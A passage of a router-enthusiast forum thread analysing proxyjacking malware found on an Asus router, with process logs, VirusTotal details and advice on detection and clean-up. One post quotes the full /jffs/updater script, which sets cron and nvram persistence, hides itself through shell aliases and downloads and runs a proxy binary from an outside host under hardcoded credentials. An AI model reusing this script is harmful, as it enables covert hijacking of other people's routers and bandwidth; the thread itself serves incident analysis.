Malware /jffs/updater script.

[Swistheater]

FYI All wget and curl commands are auto-logged to /jffs/wglst and /jffs/curllst respectively.

(4925)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(5143)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(28027)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(28242)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24200)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24447)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(26206)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(26461)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(15421)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24361)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24577)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(19534)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(19886)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10807)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2427)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(13211)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(13678)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(14029)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(8184)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2388)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(11720)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2429)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(7605)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2391)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(11800)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2430)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(8066)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2383)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(9213)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10604)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(10603)/bin/sh /jffs/updater
(2412)/bin/sh -c /jffs/updater
(1)crond -l 9
(0)/sbin/init
(3502)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(3501)ash /jffs/updater

Ye ask, and ye shall receive!

 

[thelonelycoder]

(4925)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(5143)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(28027)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(28242)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24200)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24447)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(26206)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(26461)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(15421)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24361)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24577)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(19534)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(19886)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10807)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2427)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(13211)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(13678)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(14029)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(8184)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2388)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(11720)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2429)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(7605)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2391)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(11800)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2430)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(8066)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2383)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(9213)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10604)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(10603)/bin/sh /jffs/updater
(2412)/bin/sh -c /jffs/updater
(1)crond -l 9
(0)/sbin/init
(3502)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(3501)ash /jffs/updater

Ye ask, and ye shall receive!

Folks, don't click on the last two links.

 

[Adamm]

Folks, don't click on the last two links.

VirusTotal

VirusTotal

www.virustotal.com

Mostly what you would expect

Build Info Deps​

Path
Version
bitbucket.org/karolis-proxies-project/go-pawns
v0.38.1
bitbucket.org/karolis-proxies-project/go-socks5
v0.1.0
github.com/Konstantin8105/FreePort
v0.0.0-20170920080630-ee2c5b53b80f
github.com/denisbrodbeck/machineid
v1.0.1
github.com/ethereum/go-ethereum
v1.10.25
github.com/go-stack/stack
v1.8.1
github.com/gorilla/websocket
v1.5.0
github.com/gwatts/rootcerts
v0.0.0-20221101192827-4691bc73c2b8
github.com/huin/goupnp
v1.0.3
github.com/jackpal/go-nat-pmp
v1.0.2
github.com/oklog/ulid
v1.3.1
github.com/pbnjay/memory
v0.0.0-20210728143218-7b4eea64cf58
github.com/pkg/errors
v0.9.1
golang.org/x/crypto
v0.1.0
golang.org/x/net
v0.1.0
golang.org/x/sync
v0.1.0

First Submission
2023-05-10 02:15:39 UTC
Last Submission
2023-05-28 08:45:47 UTC
Last Analysis
2023-05-10 02:15:39 UTC

 

[ColinTaylor]

(4925)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(5143)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(28027)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(28242)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24200)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24447)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(26206)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(26461)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(15421)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24361)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24577)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(19534)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(19886)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10807)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2427)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(13211)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(13678)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(14029)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(8184)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2388)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(11720)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2429)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(7605)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2391)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(11800)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2430)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(8066)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2383)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(9213)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10604)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(10603)/bin/sh /jffs/updater
(2412)/bin/sh -c /jffs/updater
(1)crond -l 9
(0)/sbin/init
(3502)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(3501)ash /jffs/updater

Ye ask, and ye shall receive!

Where did you get this log file from? If you did the hard reset I suggested in post #2 it should have been wiped out along with any traces of the malware. If you backed up and restored your jffs partition that would have defeated the purpose of the hard reset.

 

[ATLga]

Where did you get this log file from? If you did the hard reset I suggested in post #2 it should have been wiped out along with any traces of the malware. If you backed up and restored your jffs partition that would have defeated the purpose of the hard reset.

Great question

 

[Swistheater]

Where did you get this log file from? If you did the hard reset I suggested in post #2 it should have been wiped out along with any traces of the malware. If you backed up and restored your jffs partition that would have defeated the purpose of the hard reset.

I saved the log and a few other file contents in jffs before I wiped. I just wasn't really sure if it would provide any real details. @thelonelycoder is the mastermind on me providing the details from it. I am surprised he is the first person to say something. The fact that I did a hard reset and complete manual reconfigure is the only reason I can confirm to you today that the malware was wiped.

 

[Swistheater]

@ColinTaylor

I literally had to manually copy any of custom jffs script contents because all the permissions in JFFS were messed up. Making it completely unfeasible for me to tar and restore by excluding the contents of the malware "/jffs/updater".

if cat ~/.profile | grep "alias ls='f()"
then
    echo ""
else
    echo "alias ls='f(){ ls \"\$@\" | grep -v updateservice | grep -v updater | grep -v .profile; unset -f f; }; f'" >> ~/.profile
    echo "alias ps='f(){ ps \"\$@\" | grep -v updateservice | grep -v updater; unset -f f; }; f'" >> ~/.profile
    echo "alias cat='f(){ cat \"\$@\" | grep -v updater | grep -v updateservice; unset -f f; }; f'" >> ~/.profile
fi

This line of code must have literally done something destructive.

 

[maxbraketorque]

The scripts I had installed are listed in the signature except @Viktor Jaep script VPNMON-R2 which I have not used in a few months since I canceled my VPN services. No ports were open. Remote access disabled. AiProtect was turned on, I forgot to save its history before nuking the router. VPN services have been turned off for the last three months. Script had a time stamp of May 2, 2023.

WAN access to both ssh and https were disabled, and you aren't using the ASUS router app (which apparently enables WAN access without indicating it in the router settings)? UPNP disabled?

 

[Swistheater]

WAN access to both ssh and https were disabled, and you aren't using the ASUS router app (which apparently enables WAN access without indicating it in the router settings)? UPNP disabled?

UPNP "Secure" was enabled, Wan access completely disabled.

I had skynet installed using skynets default lists. Diversion lite installed using the large blocklist. I just placed an order online for a new SSD. Should arrive tomorrow. I will manually reinstall the scripts in my signature one by one.

 

[ColinTaylor]

This line of code must have literally done something destructive.

I don't think so. That code would only affect a terminal session. It hides the updater, updateservice and .profile output from ls, ps and cat.

If you still have a copy of the /jffs/asd.log file you might see something like this, if the malware even made it that far.

1685259650[remove_file]Delete harmful file,/tmp/updateservice
1685259650[blockfile] /tmp/updateservice is binary.

I can't see anything in the code that @Swistheater posted that is Merlin-specific.

Looking at the nvram variables it modifies a bit closer, some of them were removed from asuswrt firmware versions after 380.x. So my guess is that this is a modified version of some old malware that's been repurposed to monetize the theft of your bandwidth.

 

[XIII]

/tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos

Would it make sense that the OP reports this to the Proton Security Response Center?

(to get that account removed/disabled?)

And report it to ASUS as well?

 

[Clark Griswald]

Question: How exactly do we check for this? Asking for a paranoid friend that lives inside my head.

 

[drinkingbird]

UPNP "Secure" was enabled, Wan access completely disabled.

View attachment 50462

I had skynet installed using skynets default lists. Diversion lite installed using the large blocklist. I just placed an order online for a new SSD. Should arrive tomorrow. I will manually reinstall the scripts in my signature one by one.

You mentioned having a VPN at some point, so that is one possibility. VPN bypasses pretty much all security controls and relies on how you configure the VPN client's permissions. But could just have easily been an infected device on your network, potentially exploiting UPNP or perhaps a weak password on your router.

 

[drinkingbird]

Question: How exactly do we check for this? Asking for a paranoid friend that lives inside my head.

If you want to look for this particular one you can look for the files or log entries that have been posted. If you want to look for any malware in general you have to look through logs, running processes, active connections sourcing from the router, etc.

 

[DAVID LONG]

Any idea what this is?

May 28 11:37:36 rc_service: httpd 1965:notify_rc restart_dnsfilter
May 28 11:37:36 custom_script: Running /jffs/scripts/service-event (args: restart dnsfilter)
May 28 11:37:37 custom_config: Appending content of /jffs/configs/dnsmasq.conf.add.
May 28 11:37:37 custom_script: Running /jffs/scripts/dnsmasq.postconf (args: /etc/dnsmasq.conf)
May 28 11:37:37 custom_script: Running /jffs/scripts/firewall-start (args: eth0)
May 28 12:16:43 roamast: sta[DC:EF:CA:CF:98:7E] on ap[A0:36:BC:75:7B:5C], rcpi is 98 and rssi is -61
May 28 12:17:33 roamast: sta[DC:EF:CA:CF:98:7E] on ap[A0:36:BC:75:7B:5C], rcpi is 104 and rssi is -58

 

[ColinTaylor]

Any idea what this is?

May 28 11:37:36 rc_service: httpd 1965:notify_rc restart_dnsfilter
May 28 11:37:36 custom_script: Running /jffs/scripts/service-event (args: restart dnsfilter)
May 28 11:37:37 custom_config: Appending content of /jffs/configs/dnsmasq.conf.add.
May 28 11:37:37 custom_script: Running /jffs/scripts/dnsmasq.postconf (args: /etc/dnsmasq.conf)
May 28 11:37:37 custom_script: Running /jffs/scripts/firewall-start (args: eth0)
May 28 12:16:43 roamast: sta[DC:EF:CA:CF:98:7E] on ap[A0:36:BC:75:7B:5C], rcpi is 98 and rssi is -61
May 28 12:17:33 roamast: sta[DC:EF:CA:CF:98:7E] on ap[A0:36:BC:75:7B:5C], rcpi is 104 and rssi is -58

Those messages are unrelated to this thread.

 

[DAVID LONG]

OK, Thanks.

The "custom script running" had me concerned as I have not entered any custom scripts, thought it might be malware.

 

[Swistheater]

Question: How exactly do we check for this? Asking for a paranoid friend that lives inside my head.

I saw it using htop when the script was running, and I was able to access it manually using winscp directly to /jffs/* directory. I couldn't see it in ssh as @ColinTaylor pointed out it highjacks the ./profile so that file appears invisible using "ls" per terminal session. I also saw it when using the cru -l command to investigate the crontab.

 

[follower]

What is this random /jffs/updater script?

#!/bin/sh

if ls /jffs/p32
then
    exit
fi

cru a updater "* * * * * /jffs/updater"

nvram set vpn_server1_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server1_state | grep 2
then
    echo ""
else
    nvram set vpn_server1_state=2
    nvram set vpn_server1_nm=255.255.255.0
    nvram set vpn_server1_local=10.8.0.1
    nvram set vpn_server1_hmac=-1
    nvram set vpn_server1_errno=0
    nvram set vpn_server1_rgw=0
    nvram set vpn_server1_poll=0
    nvram set vpn_server1_reneg=-1
    nvram set vpn_server1_r1=192.168.1.50
    nvram set vpn_server1_r2=192.168.1.55
    nvram set vpn_server1_pdns=0
    nvram set vpn_server1_if=tun
    nvram set vpn_server1_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server1_remote=10.8.0.2
    nvram set vpn_server1_comp=yes
    nvram set vpn_server1_tls_keysize=0
    nvram set vpn_server1_firewall=auto
    nvram set vpn_server1_ccd=0
    nvram set vpn_server1_sn=10.8.0.0
    nvram set vpn_server1_digest=SHA1
    nvram set vpn_server1_c2c=0
    nvram set vpn_server1_state=2
    nvram set vpn_server1_crypt=tls
    nvram set vpn_server1_plan=1
    nvram set vpn_server1_ccd_excl=0
    nvram set vpn_server1_proto=udp
    nvram set vpn_server1_igncrt=0
    nvram set vpn_server1_cipher=AES-128-CBC
    nvram set vpn_server1_dhcp=1
    nvram set vpn_server1_port=31194
fi

nvram set vpn_server_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server_state | grep 2
then
    echo ""
else
    nvram set vpn_server_state=2
    nvram set vpn_server_nm=255.255.255.0
    nvram set vpn_server_local=10.8.0.1
    nvram set vpn_server_hmac=-1
    nvram set vpn_server_errno=0
    nvram set vpn_server_rgw=0
    nvram set vpn_server_poll=0
    nvram set vpn_server_reneg=-1
    nvram set vpn_server_r1=192.168.1.50
    nvram set vpn_server_r2=192.168.1.55
    nvram set vpn_server_pdns=0
    nvram set vpn_server_if=tun
    nvram set vpn_server_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server_remote=10.8.0.2
    nvram set vpn_server_comp=yes
    nvram set vpn_server_tls_keysize=0
    nvram set vpn_server_firewall=auto
    nvram set vpn_server_ccd=0
    nvram set vpn_server_sn=10.8.0.0
    nvram set vpn_server_digest=SHA1
    nvram set vpn_server_c2c=0
    nvram set vpn_server_state=2
    nvram set vpn_server_crypt=tls
    nvram set vpn_server_plan=1
    nvram set vpn_server_ccd_excl=0
    nvram set vpn_server_proto=udp
    nvram set vpn_server_igncrt=0
    nvram set vpn_server_cipher=AES-128-CBC
    nvram set vpn_server_dhcp=1
    nvram set vpn_server_port=31723
fi

nvram set jffs2_exec='ash /jffs/updater'
nvram set script_usbmount='ash /jffs/updater'
nvram set script_usbumount='ash /jffs/updater'

nvram commit

if cat ~/.profile | grep "alias ls='f()"
then
    echo ""
else
    echo "alias ls='f(){ ls \"\$@\" | grep -v updateservice | grep -v updater | grep -v .profile; unset -f f; }; f'" >> ~/.profile
    echo "alias ps='f(){ ps \"\$@\" | grep -v updateservice | grep -v updater; unset -f f; }; f'" >> ~/.profile
    echo "alias cat='f(){ cat \"\$@\" | grep -v updater | grep -v updateservice; unset -f f; }; f'" >> ~/.profile
fi

if ps | grep updateservice | grep -v grep
then
        echo "Running"
else
        if test -s /tmp/updateservice
        then
                echo " "
        else
        rm /tmp/updateservice
                if cat /proc/cpuinfo | grep -i ARMv7
                then
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli
                        chmod u+x /tmp/updateservice
                fi
        fi
        if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
                echo " "
        else
                rm /tmp/updateservice
                wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
                chmod u+x /tmp/updateservice
                if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
            echo " "
        else
            rm /tmp/updateservice
                    wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv6l/pawns-cli
                    chmod u+x /tmp/updateservice
                    if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            then
                echo " "
            else
                rm /tmp/updateservice
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_aarch64/pawns-cli
                        chmod u+x /tmp/updateservice
                        /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            fi
        fi
        fi
fi

* * * * * /jffs/updater #updater#

@RMerlin is this a default script?

We call this Proxyjacking. This is well known attack. This is not Malware but Exploit. It's not a new. The only difference is codes(little bit different). There is a funny thing. If I talk about these kinds of attacks at snbforum some people don't and didn't believe it. Some of them even say it doesn't exist. Don't forget you don't even know you are compromised with this attack even if you use Skynet or something else. Some attacks can evade those firewall scripts. Some codes can be generated with ChatGPT something.

Proxyjacking has Entered the Chat

Did you know that you can effortlessly make a small passive income by simply letting an application run on your...

sysdig.com

.Swistheater?​

If you are targeted the attacker may attack you again and again even if you change a router or reset firmware unless you change the IP Address with different range.

 

[Swistheater]

I don't think so. That code would only affect a terminal session. It hides the updater, updateservice and .profile output from ls, ps and cat.

If you still have a copy of the /jffs/asd.log file you might see something like this, if the malware even made it that far.

1685259650[remove_file]Delete harmful file,/tmp/updateservice
1685259650[blockfile] /tmp/updateservice is binary.

Looking at the nvram variables it modifies a bit closer, some of them were removed from asuswrt firmware versions after 380.x. So my guess is that this is a modified version of some old malware that's been repurposed to monetize the theft of your bandwidth.

Do you think routers on John's fork could be impacted?